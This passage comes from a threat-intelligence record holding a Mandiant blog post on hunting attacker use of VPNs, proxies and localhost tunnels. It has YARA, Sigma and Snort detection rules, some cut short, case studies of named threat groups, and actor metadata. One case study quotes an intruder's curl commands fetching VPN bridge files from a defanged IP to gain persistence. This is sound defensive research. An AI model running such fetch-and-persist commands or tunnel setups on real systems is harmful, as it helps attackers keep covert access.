\\\"[^\\\"]{0,100}[pP]roxy[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre2 = /\\\"description\\\": \\\"[^\\\"]{0,100}[pP]roxy[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre3 = /\\\"name\\\": \\\"[^\\\"]{0,100}[pP]roxy[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre4 = /\\\"short_name\\\": 
\\\"[^\\\"]{0,100}[pP]roxy[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre5 = /\\\"default_title\\\": \\\"[^\\\"]{0,100}(VPN|\\s+vpn|vpn\\s+)[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre6 = /\\\"description\\\": \\\"[^\\\"]{0,100}(VPN|\\s+vpn|vpn\\s+)[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre7 = /\\\"name\\\": \\\"[^\\\"]{0,100}(VPN|\\s+vpn|vpn\\s+)[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre8 = /\\\"short_name\\\": \\\"[^\\\"]{0,100}(VPN|\\s+vpn|vpn\\s+)[^\\\"]{0,100}\\\"/ ascii\r\n condition:\r\n ((uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c457f)) and filesize\r\n}\r\nLocalHost Tunnel Directions\r\nUse of Legitimate Processes\r\nConcern: Many LocalHost Tunnel processes utilize either legitimate processes (SSH) or custom non-malicious\r\nbinaries (ngrok, lt) to implement the tunnel. This hinders detection of abuse because detection leans towards\r\nmethodology and not binary identification.\r\nDirection: LocalHost Tunnels typically use unique and moderately identifiable structures of process commandlines,\r\nwhich allows for detection opportunities.\r\nLocalHost Tunnel Commandlines\r\nLocalhost Tunnel Host Commands (METHODOLOGY)\r\ntitle: 'Localhost Tunnel Host Commands (METHODOLOGY)'\r\ndescription: 'Detect potential localhost tunnel commandlines.'\r\nauthor: Mandiant\r\ndate: '2022-06-15'\r\nstatus: hunting\r\nlogsource:\r\n product: 'FireEye HX'\r\ndetection:\r\n selectionKnownCMDs:\r\n processEvent processCmdLine|re:\r\n - 'ngrok\\s+(http|tcp|tls|start)\\s+'\r\n - 'lt\\s+--port\\s+[0-9]{1,5}'\r\n - 'gotunnelme\\s+[0-9]{1,5}'\r\n selectionNgrokProcess:\r\n processEvent processCmdLine|contains: \"ngrok\"\r\n selectionNgrokCMD:\r\n processEvent processCmdLine|contains:\r\n - 'http '\r\n - 'tls '\r\n - 'tcp '\r\n - 'start '\r\n selectionLHRun1:\r\n processEvent processCmdLine|contains: \"ssh\"\r\n selectionLHRun2:\r\n processEvent 
processCmdLine|contains: \"-R\"\r\n selectionLocalTunnel1:\r\n processEvent processCmdLine|contains: \"localtunnel\"\r\n selectionLocalTunnel2:\r\n processEvent processCmdLine|contains: \"--port\"\r\n selectionLocalTunnel3:\r\n processEvent processCmdLine|contains:\r\n - \"/lt\"\r\n - \"\\lt\"\r\n - \" lt\"\r\n selectionLocalTunnel4:\r\n processEvent processCmdLine|contains:\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 17 of 26\n\n- \" http\"\r\n - \" https\"\r\n selectionLocalTunnel5:\r\n processEvent processCmdLine|contains:\r\n - \"-s\"\r\n - \"--server\"\r\n - \"-h\"\r\n - \"--host\"\r\n - \"-p\"\r\n - \"--port\"\r\n condition: selectionKnownCMDs or (selectionNgrokProcess and selectionNgrokCMD) or (selectionLHRun1 and selec\r\nfields:\r\n - \"processEvent processCmdLine\"\r\n - \"processEvent Process\"\r\n - \"processEvent Username\"\r\n - \"processEvent Md5\"\r\nfalsepositives:\r\n - \"Unknown\"\r\nlevel: \"medium\"\r\nNgrok Agent IPs in Network Traffic\r\nHistorically, Ngrok’s tunneling protects origin servers by hiding the origin IPs. However, the origin IPs for all free\r\nendpoints are exposed in the ngrok-agent-ips header on all HTTP responses returned by the tunnel endpoint. This\r\ncan easily be hunted for and detected via Snort to better label and understand network session data.\r\nalert tcp any any -\u003e any any ( msg:\"M.Tunneler.HTTP.Ngrok.[response]\"; content:\"HTTP/1\"; depth:6; content:\"200\r\nOther Generic Directions\r\nFiles that contain common VPN equities\r\nConcern: Adversaries may use modified binaries to interact with VPN infrastructure. This more general direction\r\nallows for a comprehensive look into potential VPN-like behavior.\r\nDirection: Identify core binary components that are not so easily modified to match on (i.e. 
PDB paths, exports, third-party libraries, domains, etc.)\r\nGeneric Domains in Binaries\r\nrule M_Hunting_VPNEngine_GenericProxyVPNDomain_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for generic proxy/vpn domains.\"\r\n md5 = \"96842ad6cc00fab5776171c56812b9a5\"\r\n strings:\r\n $UniqueProxyVPNDomain = /(proxy|vpn)\\.[^\\.]{1,100}\\.(net|com|org)/ ascii fullword nocase\r\n condition:\r\n filesize \u003c 5MB and ((uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c\r\n}\r\nConventionEngine\r\nAs documented in the Definitive Dossier of Devilish Debug Details: Part One:\r\n“Often users name folders and files based on their content. Computers force users to label and annotate their data based on the data type, role, and purpose. This human-computer convention means that most digital content has some descriptive surface area, or descriptive “features” that are present in many files, including malware files…. Not all these features were meant to be in [a binary], and they were certainly not intended for defenders to notice. This is especially true for PDB paths, which can be described as an outcome of the compilation process, a toolmark left in malware that describes the development environment.”\r\nVPN or Proxy PDB Convention\r\nrule M_Hunting_Win_VPNEngine_PDB_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for VPN or Proxy PDB.\"\r\n md5 = \"2bf422e19e721b461f9e98271fb28ad3\"\r\n strings:\r\n $pdb = /RSDS[\\x00-\\xFF]{20}[a-zA-Z]:\\\\[\\x00-\\xFF]{0,500}(vpn|proxy)[\\x00-\\xFF]{0,500}\\.pdb\\x00/ ascii nocase\r\n condition:\r\n filesize \u003c 5MB and uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pdb\r\n}\r\nHunting 3rd Party Libraries\r\nWhile some products are more popular than others, there are countless VPN software companies and 
products. Relying on brand-specific detections therefore does not scale to wide coverage; detecting the popular third-party libraries that this software shares gives a broader and more inclusive scope. Some of these third-party tunnel libraries include gotunnelme, golocaltunnel, localtunnel.net, and zdtun.\r\nGoTunnelMe Library\r\nrule M_Hunting_AscensionEngine_gotunnelme_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for binaries that use gotunnelme.\"\r\n md5 = \"35fcc4b19946d1bc9c21add1f42d2b63\"\r\n strings:\r\n $anchor = \"gotunnelme\" ascii nocase wide\r\n $func1 = \"NewTunnelConn\" ascii nocase wide\r\n $func2 = \"Tunnel\" ascii nocase wide\r\n $func3 = \"StopTunnel\" ascii nocase wide\r\n $func4 = \"ConnectRemote\" ascii nocase wide\r\n $func5 = \"NewTunnel\" ascii nocase wide\r\n $func6 = \"GetUrl\" ascii nocase wide\r\n condition:\r\n ((uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c457f)) and filesiz\r\n}\r\nGoLocalTunnel Library\r\nrule M_Hunting_AscensionEngine_golocaltunnel_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for binaries that use golocaltunnel.\"\r\n md5 = \"35fcc4b19946d1bc9c21add1f42d2b63\"\r\n strings:\r\n $anchor1 = \"localtunnel.go\" ascii nocase wide\r\n $func1 = \"readAtmost\" ascii nocase wide\r\n $func2 = \"Network\" ascii nocase wide\r\n $func3 = \"WaitFor\" ascii nocase wide\r\n $func4 = \"Accept\" ascii nocase wide\r\n $func5 = \"Addr\" ascii nocase wide\r\n $func6 = \"URL\" ascii nocase wide\r\n $func7 = \"ReachedEOF\" ascii nocase wide\r\n $func8 = \"setDefaults\" ascii nocase wide\r\n condition:\r\n ((uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c457f)) and filesiz\r\n}\r\nLocalTunnelNet Library\r\nrule 
M_Hunting_AscensionEngine_localtunnelnet_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for binaries that use localtunnel.net.\"\r\n md5 = \"35fcc4b19946d1bc9c21add1f42d2b63\"\r\n strings:\r\n $s1 = \"Localtunnel\" ascii nocase wide\r\n $s2 = \"LocaltunnelClient\" ascii nocase wide\r\n $s3 = \"ProxiedSslTunnelOptions\" ascii nocase wide\r\n $s4 = \"ProxiedSslTunnelConnection\" ascii nocase wide\r\n condition:\r\n ((uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c457f)) and filesiz\r\n}\r\nZDTun Library\r\nrule M_Hunting_AscensionEngine_zdtun_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for binaries that use zdtun.\"\r\n md5 = \"f224e0c1ad6d27c76b1f87fdb8ada639\"\r\n strings:\r\n $anchor = \"zdtun\" ascii nocase wide\r\n $s1 = \"zdtun_conn_close\" ascii nocase wide\r\n $s2 = \"zdtun_conn_dnat\" ascii nocase wide\r\n $s3 = \"zdtun_conn_proxy\" ascii nocase wide\r\n $s4 = \"zdtun_conn_set_userdata\" ascii nocase wide\r\n $s5 = \"zdtun_fds\" ascii nocase wide\r\n $s6 = \"zdtun_finalize\" ascii nocase wide\r\n $s7 = \"zdtun_get_stats\" ascii nocase wide\r\n $s8 = \"zdtun_make_iphdr\" ascii nocase wide\r\n $s9 = \"zdtun_purge_expired\" ascii nocase wide\r\n $s10 = \"zdtun_set_dnat_info\" ascii nocase wide\r\n $s11 = \"zdtun_set_mtu\" ascii nocase wide\r\n $s12 = \"zdtun_set_socks5_proxy\" ascii nocase wide\r\n $s13 = \"zdtun_conn_get_userdata\" ascii nocase wide\r\n $s14 = \"zdtun_userdata\" ascii nocase wide\r\n $s15 = \"zdtun_init\" ascii nocase wide\r\n condition:\r\n ((uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c457f)) and filesiz\r\n}\r\nGeneric Proxy, Tunnel, or VPN Library via Github\r\nrule M_Hunting_AscensionEngine_GithubVPNProxy_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for binaries that include 
vpn/proxy/tunnel github links\"\r\n strings:\r\n $r1 = /github.com\\/[^\\/]+\\/[^\\/]*(vpn|VPN|proxy|Proxy|tunnel|Tunnel)[^\\/]*\\//\r\n $vpn = \"vpn\" nocase fullword\r\n $proxy = \"proxy\" nocase fullword\r\n $tunnel = \"tunnel\" nocase fullword\r\n condition:\r\n ((uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c457f)) and filesiz\r\n}\r\nBinary Export Artifacts\r\nBased on Microsoft documentation, DLL files contain an exports table. The exports table includes the name of every function that the DLL exports to other executables. These functions are the entry points into the DLL; only the functions in the exports table can be accessed by other executables.\r\nExport names can hint at a binary's intent, especially when they are unusual or purpose-built. Other portable executable details, such as resource names and embedded domains, offer similar insight.\r\nVPN Specific DLL Exports\r\nimport \"pe\"\r\nrule M_Hunting_Win_ExportEngine_vpn_dll_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Looks for an export dll containing the string vpn\"\r\n reference = \"https://twitter.com/stvemillertime/status/1241027937970814976?s=20\u0026t=t2Esf89F6T8LuiBsT8RV-g\"\r\n md5 = \"61d59eb2799b1a77eedf34b145cf23e1\"\r\n strings:\r\n $pcre = /[\\x00-\\x7F]{0,100}(vpn|VPN)[\\x00-\\x7F]{0,100}\\.(dat|dll|sys|exe)\\x00/\r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(p\r\n}\r\nProxy Specific DLL Exports\r\nimport \"pe\"\r\nrule M_Hunting_Win_ExportEngine_proxy_dll_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Looks for an export dll containing the string proxy\"\r\n reference = 
\"https://twitter.com/stvemillertime/status/1241027937970814976?s=20\u0026t=t2Esf89F6T8LuiBsT8RV-g\r\n md5 = \"61d59eb2799b1a77eedf34b145cf23e1\"\r\n strings:\r\n $pcre = /[\\x00-\\x7F]{0,100}(proxy|Proxy|PROXY)[\\x00-\\x7F]{0,100}\\.(dat|dll|sys|exe)\\x00/\r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(p\r\n}\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 22 of 26\n\nVPN or Proxy Specific PE Resource Names\r\nimport \"pe\"\r\nrule M_Hunting_Win_VPNEngine_ResourceInPE_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This signature is looking for VPN or Proxy subresources.\"\r\n md5 = \"2ce7a0ffa14134167945e8df84755f1c\"\r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and for any i in (0.. pe.number_of_resources\r\nImpact - A Case Study\r\nAs analysts, researchers, engineers, etc. - time is limited. Time is one of the greatest resources that anyone has. So,\r\nit’s important to ask the question: Why care? Well, the following sections will highlight a variety of adversaries\r\nabusing the techniques and technologies discussed in this blog.\r\nUNC3500\r\nUNC3500 is a suspected Chinese actor that has leveraged CVE-2021-44228 to target entities in the education and\r\ntelecommunications sectors. 
The group has established persistence by creating a VPN and HTTPS server that can function as a backdoor following initial compromise.\r\nFollowing reconnaissance and initial actions in a specific UNC3500 intrusion, the attackers downloaded the aforementioned VPN software and HTTPS server using the following commands:\r\ncurl hxxp://35.189.145[.]119/hamcore.se2 \u003e /mi/pki/mics/log/hamcore.se2\r\n(MD5: 9fb1191ba0064d317a883677ce568023)\r\ncurl hxxp://35.189.145[.]119/https \u003e /mi/pki/mics/log/https\r\n(MD5: 00352d167c44272dba415c36867a8125)\r\ncurl hxxp://35.189.145[.]119/vpn_bridge.config \u003e /mi/pki/mics/log/vpn_bridge.config\r\n(MD5: ce5d96252315e2c9d5fd9aeb98ae28ae)\r\nThe https and hamcore.se2 files are components of SoftEther’s VPN server bridge, PacketiX. The PacketiX VPN Bridge creates a layer 2 connection between a physical network adapter on a local system and a remote SoftEther VPN server. It requires an accompanying library file hamcore.se2 and a configuration file vpn_bridge.config. By deploying this package, UNC3500 established persistence on the compromised server.\r\nAPT40\r\nAPT40 primarily carries out intrusion activities against maritime industries and has been linked to activity dating back to at least 2013. In April 2021, four members of APT40 were indicted by the U.S. Department of Justice, alleged to be working on behalf of the MSS in Hainan. Operations may target sensitive data that would benefit research and development programs, inform decision makers sponsoring these actors, and enable further targeting of related organizations.\r\nOne methodology observed being used by APT40 includes exfiltration via VPN. 
Additionally, APT40 has been identified utilizing ProtonVPN and ExpressVPN.\r\nUNC2465\r\nIn a supply chain intrusion, SMOKEDHAM, a lightweight .NET-based backdoor used by UNC2465, used PowerShell to connect to third-party file sharing sites to download an Ngrok utility that was renamed conhost.exe. A script was used to execute Ngrok with a configuration file named ngrok.yml. Ngrok is a publicly available utility that can expose local servers behind NATs and firewalls to the public internet over secure tunnels.\r\nUNC2465 is a threat cluster that has previously deployed DARKSIDE ransomware and is suspected to have been active since at least March 2020. UNC2465 activity is characterized by the ongoing use of similar tactics, techniques, and procedures (TTPs) to distribute the publicly available PowerShell-based SMOKEDHAM backdoor in victim environments. UNC2465 has extorted victims using a hybrid approach of DARKSIDE ransomware and extortion through a leaks website over TOR. DARKSIDE applies pressure initially by shaming a victim with a small amount of data published on the DARKSIDE blog, followed by larger releases of data lasting several days if the victim does not pay. This group likely represents an affiliate, only a small part of the overall DARKSIDE ecosystem. UNC2465 has used phishing, web compromises, and supply chain access through the trojanization of legitimate software installers. UNC2465 activities have continued past the overall shutdown of the DARKSIDE RaaS.\r\nUnderground Forums\r\nAn English-speaking actor named 'idk' advertised access to U.S. 
insurance and healthcare companies, listing the method of access as “OpenVPN installed” and “credentials from OpenVPN”.\r\nVPNs as Sources\r\nUNC3661 has used NordVPN to hide origin IPs for their remote interactions with victim environments.\r\nA NEARTWIST cluster of activity used against Ukraine (linked to APT28 with moderate confidence) logged in to web shells using ExpressVPN IP addresses.\r\nPrevalence\r\nA Jedi Master once said, “Prevalence is the number one thing analysts want”. So let's talk prevalence! Utilizing the various detections and methods highlighted in this blog against housed Mandiant data, 40+ connections were made to different adversary groups and malware families.\r\nAdversary Clusters and Groups: APT12, APT22, APT28, APT37, APT40, UNC270, UNC530, UNC875, UNC961, UNC1066, UNC1575, UNC1585, UNC1615, UNC1804, UNC2465, UNC2984, UNC3325, UNC3500, UNC3661, UNC3804\r\nMalware Families and Exploits: BEACON, BEEBSINFO, DARKNEURON, DIMCLERK, EMOTET, HALFSPOT, HIDEYHOLE, HTRAN, ICEFOG, IRONGATE, KICKBACK, LOKIBOT, METERPRETER, MONEYRUN, PACMAN, PISCES, PROXYDLL, RICHBOAT, SALSAVERDE, SODARIVER, SOGU, TRICKBOT, VENOMPROXY, WMIEXEC, WSHRAT, ZXSHELL, CVE-2018-0802\r\nWhere Did We Go?\r\nThe use of VPN software, proxy services, and localhost tunnels provides adversaries with an air of legitimacy, detection bypass through encryption, and potential point-to-point access. 
These characteristics are highly desirable to an adversary, and they make detection, containment, and eradication more burdensome for the blue team.\r\nIn this blog, VPN software, proxy services, and localhost tunnels were analyzed for hunting directions. These hunting directions included vendor- and service-specific items (SoftEther, Ngrok, WireGuard, OpenVPN, Hide.Me, etc.), but also focused on holistic and tradecraft-related directions (conventions, third-party libraries, PE artifacts, etc.).\r\nThese directions will expand the defender’s hunting and detection repertoire against these software and service suites, lowering the burden on the blue team.\r\nHappy Hunting\r\nAcknowledgements\r\nThanks to everyone that contributed analysis and review. Special thanks to Matthew Dunwoody and Evan Reese.\r\nDisclaimer\r\nThe signatures documented in this blog are meant to be threat hunting directions and jump-points – empowering the analyst to take the next step down the rabbit hole and identify suspicious activity. Every network is different and because of that, these signatures should not be deployed in production environments without testing and, when required, tuning.\r\nCase studies and examples are drawn from our experiences and activities working for a variety of customers, and do not represent our work for any one customer or set of customers. In many cases, facts have been changed to obscure the identity of our customers and individuals associated with our customers.\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns"
	],
	"report_names": [
		"burrowing-your-way-into-vpns"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "1aead86d-0c57-4e3b-b464-a69f6de20cde",
			"created_at": "2023-01-06T13:46:38.318176Z",
			"updated_at": "2026-04-10T02:00:02.925424Z",
			"deleted_at": null,
			"main_name": "DAGGER PANDA",
			"aliases": [
				"UAT-7290",
				"Red Foxtrot",
				"IceFog",
				"RedFoxtrot",
				"Red Wendigo",
				"PLA Unit 69010"
			],
			"source_name": "MISPGALAXY:DAGGER PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d4b9608d-af69-43bc-a08a-38167ac6306a",
			"created_at": "2023-01-06T13:46:39.335061Z",
			"updated_at": "2026-04-10T02:00:03.291149Z",
			"deleted_at": null,
			"main_name": "LAPSUS",
			"aliases": [
				"Lapsus",
				"LAPSUS$",
				"DEV-0537",
				"SLIPPY SPIDER",
				"Strawberry Tempest",
				"UNC3661"
			],
			"source_name": "MISPGALAXY:LAPSUS",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "056826cb-6e17-4954-a9b4-2cc8c6ae3cb8",
			"created_at": "2023-03-04T02:01:54.115678Z",
			"updated_at": "2026-04-10T02:00:03.360898Z",
			"deleted_at": null,
			"main_name": "Prophet Spider",
			"aliases": [
				"GOLD MELODY",
				"UNC961"
			],
			"source_name": "MISPGALAXY:Prophet Spider",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7b039cc0-33b6-495a-b4ca-649d096b993d",
			"created_at": "2023-01-06T13:46:38.482654Z",
			"updated_at": "2026-04-10T02:00:02.99265Z",
			"deleted_at": null,
			"main_name": "APT22",
			"aliases": [
				"G0039",
				"Suckfly",
				"BRONZE OLIVE",
				"Group 46"
			],
			"source_name": "MISPGALAXY:APT22",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "16f2436b-5f84-44e3-a306-f1f9e92f7bea",
			"created_at": "2023-01-06T13:46:38.745572Z",
			"updated_at": "2026-04-10T02:00:03.086207Z",
			"deleted_at": null,
			"main_name": "APT40",
			"aliases": [
				"ATK29",
				"Red Ladon",
				"MUDCARP",
				"ISLANDDREAMS",
				"TEMP.Periscope",
				"KRYPTONITE PANDA",
				"G0065",
				"TA423",
				"ITG09",
				"Gingham Typhoon",
				"TEMP.Jumper",
				"BRONZE MOHAWK",
				"GADOLINIUM"
			],
			"source_name": "MISPGALAXY:APT40",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bbe36874-34b7-4bfb-b38b-84a00b07042e",
			"created_at": "2022-10-25T15:50:23.375277Z",
			"updated_at": "2026-04-10T02:00:05.327922Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"APT37",
				"InkySquid",
				"ScarCruft",
				"Group123",
				"TEMP.Reaper",
				"Ricochet Chollima"
			],
			"source_name": "MITRE:APT37",
			"tools": [
				"BLUELIGHT",
				"CORALDECK",
				"KARAE",
				"SLOWDRIFT",
				"ROKRAT",
				"SHUTTERSPEED",
				"POORAIM",
				"HAPPYWORK",
				"Final1stspy",
				"Cobalt Strike",
				"NavRAT",
				"DOGCALL",
				"WINERACK"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552ff939-52c3-421b-b6c9-749cbc21a794",
			"created_at": "2023-01-06T13:46:38.742547Z",
			"updated_at": "2026-04-10T02:00:03.08515Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"Operation Daybreak",
				"Red Eyes",
				"ScarCruft",
				"G0067",
				"Group123",
				"Reaper Group",
				"Ricochet Chollima",
				"ATK4",
				"APT 37",
				"Operation Erebus",
				"Moldy Pisces",
				"APT-C-28",
				"Group 123",
				"InkySquid",
				"Venus 121"
			],
			"source_name": "MISPGALAXY:APT37",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "47b52642-e5b8-4502-b714-b625002d86aa",
			"created_at": "2024-06-19T02:03:08.086579Z",
			"updated_at": "2026-04-10T02:00:03.812509Z",
			"deleted_at": null,
			"main_name": "GOLD MELODY",
			"aliases": [
				"PROPHET SPIDER",
				"UNC961"
			],
			"source_name": "Secureworks:GOLD MELODY",
			"tools": [
				"7-Zip",
				"AUDITUNNEL",
				"BURP Suite",
				"GOTROJ",
				"JSP webshells",
				"Mimikatz",
				"Wget"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d18fe42c-8407-4f96-aee0-a04e6dce219a",
			"created_at": "2023-01-06T13:46:38.275292Z",
			"updated_at": "2026-04-10T02:00:02.907303Z",
			"deleted_at": null,
			"main_name": "APT12",
			"aliases": [
				"Group 22",
				"Calc Team",
				"DNSCalc",
				"IXESHE",
				"Hexagon Typhoon",
				"BeeBus",
				"DynCalc",
				"Crimson Iron",
				"BRONZE GLOBE",
				"NUMBERED PANDA",
				"TG-2754"
			],
			"source_name": "MISPGALAXY:APT12",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e9f7f836-b77f-4f95-aa02-9e99d32faf1d",
			"created_at": "2024-12-21T02:00:02.857057Z",
			"updated_at": "2026-04-10T02:00:03.791142Z",
			"deleted_at": null,
			"main_name": "UNC2465",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC2465",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5d9dfc61-6138-497a-b9da-33885539f19c",
			"created_at": "2022-10-25T16:07:23.720008Z",
			"updated_at": "2026-04-10T02:00:04.726002Z",
			"deleted_at": null,
			"main_name": "Icefog",
			"aliases": [
				"ATK 23",
				"Dagger Panda",
				"Icefog",
				"Red Wendigo"
			],
			"source_name": "ETDA:Icefog",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"Dagger Three",
				"Fucobha",
				"Icefog",
				"Javafog",
				"POISONPLUG.SHADOW",
				"RoyalRoad",
				"ShadowPad Winnti",
				"XShellGhost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "83025f5e-302e-46b0-baf6-650a4d313dfc",
			"created_at": "2024-05-01T02:03:07.971863Z",
			"updated_at": "2026-04-10T02:00:03.743131Z",
			"deleted_at": null,
			"main_name": "BRONZE MOHAWK",
			"aliases": [
				"APT40 ",
				"GADOLINIUM ",
				"Gingham Typhoon ",
				"Kryptonite Panda ",
				"Leviathan ",
				"Nanhaishu ",
				"Pickleworm ",
				"Red Ladon ",
				"TA423 ",
				"Temp.Jumper ",
				"Temp.Periscope "
			],
			"source_name": "Secureworks:BRONZE MOHAWK",
			"tools": [
				"AIRBREAK",
				"BlackCoffee",
				"China Chopper",
				"Cobalt Strike",
				"DadJoke",
				"Donut",
				"FUSIONBLAZE",
				"GreenCrash",
				"Meterpreter",
				"Nanhaishu",
				"Orz",
				"SeDll"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "1d63fba2-f042-41ca-8a72-64c6e737d295",
			"created_at": "2025-08-07T02:03:24.643647Z",
			"updated_at": "2026-04-10T02:00:03.719558Z",
			"deleted_at": null,
			"main_name": "BRONZE OLIVE",
			"aliases": [
				"APT22 ",
				"Barista",
				"Group 46 ",
				"Suckfly "
			],
			"source_name": "Secureworks:BRONZE OLIVE",
			"tools": [
				"Angryrebel",
				"DestroyRAT",
				"PlugX"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "59be3740-c8c7-47aa-84c8-e80d0cb7ea3a",
			"created_at": "2022-10-25T15:50:23.481057Z",
			"updated_at": "2026-04-10T02:00:05.306469Z",
			"deleted_at": null,
			"main_name": "Leviathan",
			"aliases": [
				"MUDCARP",
				"Kryptonite Panda",
				"Gadolinium",
				"BRONZE MOHAWK",
				"TEMP.Jumper",
				"APT40",
				"TEMP.Periscope",
				"Gingham Typhoon"
			],
			"source_name": "MITRE:Leviathan",
			"tools": [
				"Windows Credential Editor",
				"BITSAdmin",
				"HOMEFRY",
				"Derusbi",
				"at",
				"BLACKCOFFEE",
				"BADFLICK",
				"gh0st RAT",
				"PowerSploit",
				"MURKYTOP",
				"NanHaiShu",
				"Orz",
				"Cobalt Strike",
				"China Chopper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "6a660ea2-1118-404a-9f8f-f0d6a1e9f184",
			"created_at": "2022-10-25T15:50:23.685924Z",
			"updated_at": "2026-04-10T02:00:05.364493Z",
			"deleted_at": null,
			"main_name": "APT12",
			"aliases": [
				"APT12",
				"IXESHE",
				"DynCalc",
				"Numbered Panda",
				"DNSCALC"
			],
			"source_name": "MITRE:APT12",
			"tools": [
				"Ixeshe",
				"RIPTIDE",
				"HTRAN"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "61940e18-8f90-4ecc-bc06-416c54bc60f9",
			"created_at": "2022-10-25T16:07:23.659529Z",
			"updated_at": "2026-04-10T02:00:04.703976Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Actinium",
				"Aqua Blizzard",
				"Armageddon",
				"Blue Otso",
				"BlueAlpha",
				"Callisto",
				"DEV-0157",
				"G0047",
				"Iron Tilden",
				"Operation STEADY#URSA",
				"Primitive Bear",
				"SectorC08",
				"Shuckworm",
				"Trident Ursa",
				"UAC-0010",
				"UNC530",
				"Winterflounder"
			],
			"source_name": "ETDA:Gamaredon Group",
